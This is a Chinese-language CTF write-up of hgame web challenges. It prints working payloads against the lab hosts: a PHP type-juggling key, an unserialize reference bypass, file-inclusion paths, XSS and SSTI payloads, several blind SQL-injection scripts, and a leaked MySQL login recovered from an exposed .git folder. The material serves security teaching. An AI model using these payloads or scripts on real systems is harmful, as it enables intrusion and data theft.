hgame-webwp

Are you from Europe?

cnss原题,就flag改了下,对了,似乎概率也被修改了....所以不能通过改参数的方式拿flag了.. flag:hgame{Th3\_Ch0seN\_0nE!}

special number

include_once("flag.php");
if(isset($_GET['key'])){
    // Format gate only: at least 7 characters containing a digit and a letter.
    // It says nothing about what json_decode() will turn the string into.
    $pattern = '/^(?=.*[0-9].*)(?=.*[a-zA-Z].*).{7,}$/ ';
    $key = $_GET['key'];
    if(preg_match($pattern,$key)===0){
        echo "格式错误";
    }else{
        $lock="******************";  // value masked in the listing
        // json_decode() turns a numeric-looking key (e.g. "0e123...") into a
        // float, and the loose == below then compares a number against the
        // string $lock — the type juggling the writeup's "0e" bypass relies on.
        // A strict === against the raw string (no decode) closes it.
        $b = json_decode($key);
        if($b==$lock)
            echo $flag;
        else
            echo "this is no special number";
    }
}

考的弱类型 0e绕过

http://118.25.18.223:10001/?key=0e123321123
hgame{pHp_w34k_typing_s000_e4sy}

can u find me?

明示robots.txt 查看/f1aaaaaaaag.php 提示管理员才可以拿flag 改cookie hgame{78e01ee77a39ef4e}

tell me what you want

get一个flag,发现要post,post之后提示要改xff然后ua啊referer啊什么的一堆东西不多写了 hgame{For9e\_hTTp\_iS\_N0T\_HArd}

我们不一样

strcmp,数组绕过 hgame{g3t\_f14g\_is\_so0000\_ez}

Random?

.swp文件泄漏vim -r random.php.swp拿源码

<?php
error_reporting(0);
include ('flag.php');

// Plain data holder; its serialized layout is the only thing the request shapes.
class emmm
{
    var $public;
    var $secret;
}

if ($_GET['emmm']) {
    // unserialize() on raw request input. Apart from object injection in
    // general, the serialized form may declare one property as a PHP
    // reference (R:) to the other, so both names resolve to one value.
    $emmm = unserialize($_GET['emmm']);
    if (!is_object($emmm)) {
        die("error");
    }
    // Fresh random values are assigned, but when public aliases secret the
    // second assignment overwrites both and the check always passes — the
    // randomness protects nothing. Decoding with json_decode() (or comparing
    // two locals instead of attacker-shaped properties) avoids this.
    $emmm->public = random_int(0, 100000000);
    $emmm->secret = random_int(0, 100000000);
    if ($emmm->public == $emmm->secret) {
        echo $flag;
    }
}

#highlight_file(__FILE__);

稍微看一下,引用绕过

<?php
// Same class shape as the challenge so the serialized form matches.
class emmm
{
    var $public;
    var $secret;
}

$temp=new emmm();
// Make public a reference to secret; serialize() emits it as R:2, so after
// unserialize() both properties share a single value.
$temp->public = &$temp->secret;
var_dump(serialize($temp));
http://123.206.203.108:10001/random.php?emmm=O:4:%22emmm%22:2:{s:6:%22public%22;N;s:6:%22secret%22;R:2;}

拿到flag: hgame{&\_Is\_wondeRful!@#}

草莓社区-2

文件包含, php伪协议php://filter/read=convert.base64-encode/resource=../flag.php 拿到一个base64,解两次 hgame{!m4o\_pi4n\_ChaO\_hao\_kan!}

草莓社区-1

直接访问 http://118.25.18.223:10011/show_maopian.php?mao=../flag.php hgame{#Ma0\_pi4n\_haO\_k4n\_ma#}

xss-1

// Blacklist filter from the challenge. Only the keyword regexes carry the g
// flag; /\(/ replaces the first "(" only, and the result is concatenated into
// markup without encoding. Context-aware output encoding of `input` is the
// control this is missing.
function charge(input) {
  var cleaned = input
    .replace(/script/gi, '_')
    .replace(/image/gi, '_')
    .replace(/\(/, '_');
  return '<article>' + cleaned + '</article>';
}

然后不允许交互 直接img标签.然后括号被过滤掉

(->(
)->)

最终payload

<img src="1" onerror=alert(1)>

xss-2

// Blacklist filter from the challenge. /\(/ and /\>/ have no g flag, so only
// the first "(" and ">" are replaced, and `"` is never touched even though the
// value lands inside a double-quoted attribute. Attribute-context encoding of
// `input` (at least &quot; and &lt;/&gt;) is the control this is missing.
function charge(input) {
  var cleaned = input
    .replace(/script/gi, '_')
    .replace(/img/gi, '_')
    .replace(/image/gi, '_')
    .replace(/\(/, '_')
    .replace(/\>/, '_');
  return '<input value="' + cleaned + '" type="text">';
}

然后用input标签的image属性绕

payload
1" type="image" src=1 onerror=alert(1);"

最简单的sql题

万能密码 帐号随意 密码123'or'1'='1 hgame{@s0ng\_fen\_ti@}

送分的SQLi

sqlmap -u http://118.25.18.223:10068/?id=1 -D week3_sqliiii2 -T f111aa4g --dump

+-------+---------------+-----------------------------------+
id dajiangyoude f111aaaggg_w3
+-------+---------------+-----------------------------------+
10086 kan_wo_gan_ma hgame{Th3_e4sist_sql_injeCti0n##}
+-------+---------------+-----------------------------------+
hgame{Th3\_e4sist\_sql\_injeCti0n##}

简单的SQLi

要求输入一个满足的值,使其hash的4-8位为目标值,然后再输入id,直接上脚本就好了

from md5 import md5
import requests
import re

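# Note: the original md5 helper was hand-written; the import above was only
# added out of laziness. hashlib is used here instead.
def find_md5(code):
    """Return the smallest int in [0, 1_000_000) whose MD5 hex digest has
    ``code`` at positions 4-8, or ``None`` when no candidate matches.

    The candidate is hashed as its decimal string (``str(n).encode()``),
    which is the usual reading of ``md5(each)`` — presumably what the
    challenge's proof-of-work hashes; confirm against the page's form.

    Args:
        code: the 4-character hex fragment scraped from the page.

    Returns:
        The matching int, or ``None``.
    """
    import hashlib

    for candidate in range(1000000):
        digest = hashlib.md5(str(candidate).encode()).hexdigest()
        if digest[4:8] == code:
            return candidate
    return None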

# Boolean-based blind extraction loop from the writeup (lab target hard-coded).
# Every request must carry a fresh proof-of-work answer: the response body holds
# a 4-character code (matched by the regex below), find_md5() searches for an
# int whose hash yields it, and that int is sent back as ?code=.
u=requests.session()
r=u.get('http://118.25.18.223:10086/')
ok=0  # set to 1 when a position matches no candidate, i.e. the value is exhausted
for num in range(1,100):  # 1-based character position for mid()
    for each in range(1,129):  # candidate byte value
        #id_1= "1' and (ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{num},1))={each})%23".format(num=num,each=each)
        #id_1= "1' and (ascii(mid((select group_concat(column_name) from information_schema.columns where table_name=\"w3_fllllllll4ag\"),{num},1))={each})%23".format(num=num,each=each)
        id_1= "1' and (ascii(mid((select f111144g_w3_sqli1 from w3_fllllllll4ag limit 0,1),{num},1))={each})%23".format(num=num,each=each)
        # The code is scraped from the *previous* response, so this presumably
        # relies on every served page (hit or miss) carrying a new :="xxxx".
        code = re.findall(r':="(.{4})"',r.text)[0]
        code = find_md5(code)
        r=u.get('http://118.25.18.223:10086/?id='+str(id_1)+"&code="+str(code))
        if "query ok" in r.text:
            print(chr(each),end='')  # one recovered character per outer iteration
            break
        if each==128:  # every candidate missed: nothing more to read
            ok=1

    if ok==1:
        break

表:users,w3_fllllllll4ag 列:dajiangyoude,haishijiangyou,f111144g_w3_sqli1 flag:hgame{sql\_Injection\_s000oo\_fun}

正常的SQLi

.bak文件泄漏,源码

<?php
.....

// Attacker-controlled: the cookie is only base64-decoded, never escaped or bound.
$username = base64_decode($_COOKIE['name']);

.....

// String-built SQL with the raw cookie value. A prepared statement
// (mysqli_prepare + bind_param) keeps the value out of the query text.
$sql = "select * from user where username = '{$username}'";
$re = mysqli_query($conn, $sql);
$rs = mysqli_fetch_array($re);

// The result set is never rendered, so the response reflects nothing of the
// query; only a side channel such as timing remains, which is what the writeup
// uses. Echoing the decoded cookie without htmlspecialchars() is a separate
// HTML-injection sink.
// echo $rs['flag'];
echo $username . '<br/>';
echo "因为出题人太懒了,所以现在没有任何功能";

.....

当天做的时候似乎题目是出了点问题...反正一直出错来着... 不过第二天好了... 语句只是执行,所以sleep注一下 给个脚本

import requests
import base64

# Time-based blind extraction from the writeup: the injected expression calls
# sleep(5) on a hit, and the 5-second client timeout is the oracle.
for num in range(1,50):  # 1-based character position for substr()
    for each in range(33,129):  # candidate byte value (printable range)
        ok=0  # reset per candidate; only the each==128 case below sets it
        #data='''99\' or if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{num},1))={ascii1},sleep(5),1)#'''.format(num=num,ascii1=each)
        #data='''99\' or if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="user"),{num},1))={ascii1},sleep(5),1)#'''.format(num=num,ascii1=each)
        data='''99\' or if(ascii(substr((select flag from user limit 0,1),{num},1))={ascii1},sleep(5),1)#'''.format(num=num,ascii1=each)

        headers = {"Cookie":"name="+base64.b64encode(data.encode()).decode()}
        try:
            r=requests.get('http://123.206.203.108:10010/normalSQLi/index.php',headers=headers,timeout=5)
            #print(r.text)
        # NOTE(review): a bare except treats any failure (connection error,
        # KeyboardInterrupt, ...) as a timeout, i.e. as a hit.
        except:
            print(chr(each),end='')
            break

        if each==128:  # no candidate timed out: value exhausted
            ok=1
    if ok==1:
        break

表:user 列:id,flag,username 然后注意最后提取flag的时候limit一下,在limit 2,1的时候找到flag flag:hgame{fLag\_1s\_h4re.....}

**书店

hint:外部实体 一发blind xxe 详情见前一篇moctf的题解最后一题 hgame{Xxe\_v3ry\_funny!!!!}

ngc's blog

一开始没啥思路,然后信息收集一下 发现是flask,猜想ssti,然后试了一下 访问

http://111.230.105.104:5000/aaaaaaaaa{{7+7}}

得到

http://111.230.105.104:5000/aaaaaaaaa14

即猜想正确 直接去搞flag就ok,推荐文章https://www.cnblogs.com/tyomcat/p/5440488.html 直接访问:

http://111.230.105.104:5000/aaaaaaaaa{{ ''.__class__.__mro__[2].__subclasses__()[40]('flag').read() }}

拿到flag:hgame{skdvhdsbvadvnjVADBVS}

又双叒叕是SQLI

index.php~泄漏拿到源码

<?php
error_reporting(0);
include("sql.php");
// Keyword blacklist (the alternation separators look lost in the rendered copy —
// presumably `|` between the keywords in the original). A blacklist is a weak
// control on its own: `like` is not in it, which is what the writeup uses.
$waf="/(sleepbenchmarkuniongroup by=><hex lowerstrcmpupdatexmlxmlelementextractvalueconcatbinsleepmid\(substrleftascii\/\*\*\/)/i";
if(isset($_GET['user'])){
    if(preg_match_all($waf,$_GET['user'])!=0){
        // Blocked input silently degrades to the "admin" query instead of an error.
        $user="admin";
    }else{
        // Hand-rolled quote escaping. With set_charset("gbk") below, a trailing
        // high byte in the input pairs with the inserted backslash into one
        // multibyte character, leaving the quote unescaped.
        // mysqli_real_escape_string() after set_charset(), or better a prepared
        // statement, is the correct control.
        $user = str_replace("'","\'",$_GET['user']);
    }
    //echo $user."<br>";

    $sqli = new mysqli($host,$username,$passwd,$database);
    $sqli->set_charset("gbk");
    // String-built SQL.
    $query="select * from users where username='".$user."'";
    $result = $sqli->query($query);
    //echo $sqli->error;
    $num=0;
    // @ suppresses the warning when query() returned false; $num then stays 0.
    @$num = $result->num_rows;
    if($num>0){
        while($row = $result->fetch_row()){
            echo $row[0]."    ".$row[1]."   ".$row[2]."<br>";
        }
    }
}

看了一下,like没过滤,放个脚本

import requests


# LIKE-prefix blind extraction from the writeup (lab target hard-coded). `res`
# holds the hex of the confirmed prefix; each candidate byte is appended, the
# request sent, and the byte popped again on a miss. A "guest" row in the
# response marks a hit.
payload = []
res = []
ok=0  # set to 1 when a position matches no candidate, i.e. the value is exhausted
for num in range(50):  # `num` is unused: the outer loop only bounds the number of characters read
    for each in range(33,129):  # candidate byte value (printable range)
        #payload = "lalalala%df'or(select(table_name)from(information_schema.tables)where(table_schema%0alike%0adatabase())limit%0a0,1)like\""
        #payload = "lalalala%df'or(select(column_name)from(information_schema.columns)where(table_name%0alike\"flllllag\")limit%0a1,1)like\""
        payload = "lalalala%df'or(select%0athisisflag%0afrom(flllllag)limit%0a0,1)like%0a0x"
        payload = list(payload)
        # '%' and '_' are LIKE wildcards, so they get a backslash (0x5c) in front
        # in the else branch; the two branches are otherwise identical.
        if chr(each)!='%' and chr(each)!="_":
            res.append(str(hex(each))[2:])
            payload.append(''.join(res))
            payload.append('25%23')
            r=requests.get('http://118.25.18.223:10088/?user='+''.join(payload))

            if "guest" in r.text:
                print(''.join(res))  # prints the whole confirmed hex prefix so far
                break


            else:
                res.pop()
        else:
            res.append("5c")
            res.append(str(hex(each))[2:])
            payload.append(''.join(res))
            payload.append('25%23')
            r=requests.get('http://118.25.18.223:10088/?user='+''.join(payload))

            if "guest" in r.text:
                print(''.join(res))
                break


            else:
                res.pop()
                res.pop()

        if each==128:  # every candidate missed: nothing more to read
            ok=1

    if ok==1:
        break

拿到flag hgame{like!injection!so!g00d##}

散落的flag

考的前端,做出来了都还没发现... 看个js,发现

// Posts the username shown in #user to check_user.php and renders the two
// fields of the JSON reply. The second field (a "secret") is returned for
// whatever username the page holds, so the authorization for that lookup is
// a server-side question; on the client, .html() interprets server-supplied
// strings as markup — .text() is the safer sink for plain values.
function get_userinfo(){
    var user = $("#user").text();
    var onError = function(){
        $("#username").html('Error loading XML document');
    };
    var onSuccess = function(data,status){
        $("#username").html("username: "+data[0]);
        $("#secret").html("secret: "+data[1]);
    };
    $.ajax({
        url: "check_user.php",
        type: "POST",
        data:{username:user},
        dataType: "json",
        error: onError,
        success: onSuccess
    });
}

$(document).ready(get_userinfo());

然后去ff的hackbar发包, 发个admin拿到10c546b2cf68 发个admin1拿到hgame{0102940de1 注册然后找回密码拿到98924acfce} 合并一下 hgame{0102940de110c546b2cf6898924acfce} 话说我做的时候有人把密码改成了123456,我直接就拿到了最后一个flag,就感觉很ez...

奇怪的SQLi

环境差不多配好了:http://119.28.22.85:12345 但是gopher似乎连不上sql..也可能是我配置的问题 首先.git泄漏,githack一发,之前那个脚本不行..搞不到log,推荐一个脚本 https://github.com/BugScanTeam/GitHack 然后拿到之后log一下,然后reset一下

root@VM-89-127-ubuntu:/home/ubuntu/GitHack# python GitHack.py http://119.28.22.85:12345/.git

____ _ _ _ _ _
/ ___(_) _ __ _ ___ __
_ __ _ / _` / __ / /
_ _ _ (_ (__ <
\_____\___ _\__,_\____\_\{0.0.5}
A '.git' folder disclosure exploit.

[*] Check Depends
[+] Check depends end
[*] Set Paths
[*] Target Url: http://119.28.22.85:12345/.git/
[*] Initialize Target
[*] Try to Clone straightly
[*] Clone
Cloning into '/home/ubuntu/GitHack/dist/119.28.22.85_12345'...
fatal: repository 'http://119.28.22.85:12345/.git/' not found
[-] Clone Error
[*] Try to Clone with Directory Listing
[*] http://119.28.22.85:12345/.git/ is not support Directory Listing
[-] [Skip][First Try] Target is not support Directory Listing
[*] Try to clone with Cache
[*] Initialize Git
[*] Cache files
[*] packed-refs
[*] config
[*] HEAD
[*] COMMIT_EDITMSG
[*] FETCH_HEAD
[*] /refs/heads/master
[*] index
[*] logs/HEAD
[*] refs/heads/master
[*] logs/refs/heads/master
[*] Fetch Commit Objects
[*] objects/e6/f0a50eaedaa25a44083a3f832a264cea3ba13a
[*] objects/e2/f3ab9cf26f6534d9f04cb4bbbfc7770f3486ee
[*] objects/32/2224a7f61c9d11c62fefa321ff506a24fa2d10
[*] objects/dd/45ee5b5130bde3febd21ccb823d1a9cb341fb5
[*] objects/98/acd10c8f8a476b279e391a4994fd1413a00800
[*] objects/60/019e79f3d3f4d72da7bfcbafcb44cda0da8a84
[*] objects/0d/abdd663cc60676956c8090d0f48e63b4456c03
[*] objects/21/1fcb8891233bebe0aa087642123c3b43e8d3b0
[*] objects/da/51001a93a4c74f4159b562449328ce16b90fe3
[*] objects/97/43c8a21fe4e953da555ac0f14d4ca4a1bd4302
[*] objects/db/c5e076915b5c190cc5922d15f705b6f5a4c13a
[*] objects/a9/a17e440192ca8ff4c69e52bbecadba78ef4140
[*] objects/89/a72a47dd1e777db9c845cf31a569c9df791134
[*] Fetch Commit Objects End
[*] refs/stash
[*] Valid Repository
[+] Valid Repository Success

[+] Clone Success. Dist File : /home/ubuntu/GitHack/dist/119.28.22.85_12345
root@VM-89-127-ubuntu:/home/ubuntu/GitHack# ls
data dist GitHack.py lib LICENSE README.md
root@VM-89-127-ubuntu:/home/ubuntu/GitHack# cd dist
root@VM-89-127-ubuntu:/home/ubuntu/GitHack/dist# ls
119.28.22.85_12345
root@VM-89-127-ubuntu:/home/ubuntu/GitHack/dist# cd 119.28.22.85_12345
root@VM-89-127-ubuntu:/home/ubuntu/GitHack/dist/119.28.22.85_12345# ls
css index.html index.php login.html login.php register.html register.php
root@VM-89-127-ubuntu:/home/ubuntu/GitHack/dist/119.28.22.85_12345# git log
commit e6f0a50eaedaa25a44083a3f832a264cea3ba13a
Author: blacsheep <784522717@qq.com>
Date: Thu Mar 8 15:16:38 2018 +0000

remove config

commit 322224a7f61c9d11c62fefa321ff506a24fa2d10
Author: blacsheep <784522717@qq.com>
Date: Thu Mar 8 15:15:17 2018 +0000

add php
root@VM-89-127-ubuntu:/home/ubuntu/GitHack/dist/119.28.22.85_12345# git reset --hard 322224a7f61c9d11c62fefa321ff506a24fa2d10
HEAD is now at 322224a add php
root@VM-89-127-ubuntu:/home/ubuntu/GitHack/dist/119.28.22.85_12345# ls
config.php css index.html index.php login.html login.php register.html register.php
root@VM-89-127-ubuntu:/home/ubuntu/GitHack/dist/119.28.22.85_12345# cat config.php
<?php
error_reporting(0);

$db_host = 'localhost';
$db_name = 'week4';
$db_user = 'blacsheep';
$db_pwd = 'cnss';
$conn = mysqli_connect($db_host, $db_user, $db_pwd, $db_name);
if(!$conn){
die(mysqli_connect_error());
}

root@VM-89-127-ubuntu:/home/ubuntu/GitHack/dist/119.28.22.85_12345#

然后拿到mysql的帐号密码,然后有个ssrf,gopher打mysql 推荐文章:http://www.freebuf.com/articles/web/159342.html exp:https://github.com/undefinedd/extract0r- 跑一下拿到flag,本地环境等有时间我再去弄一下吧..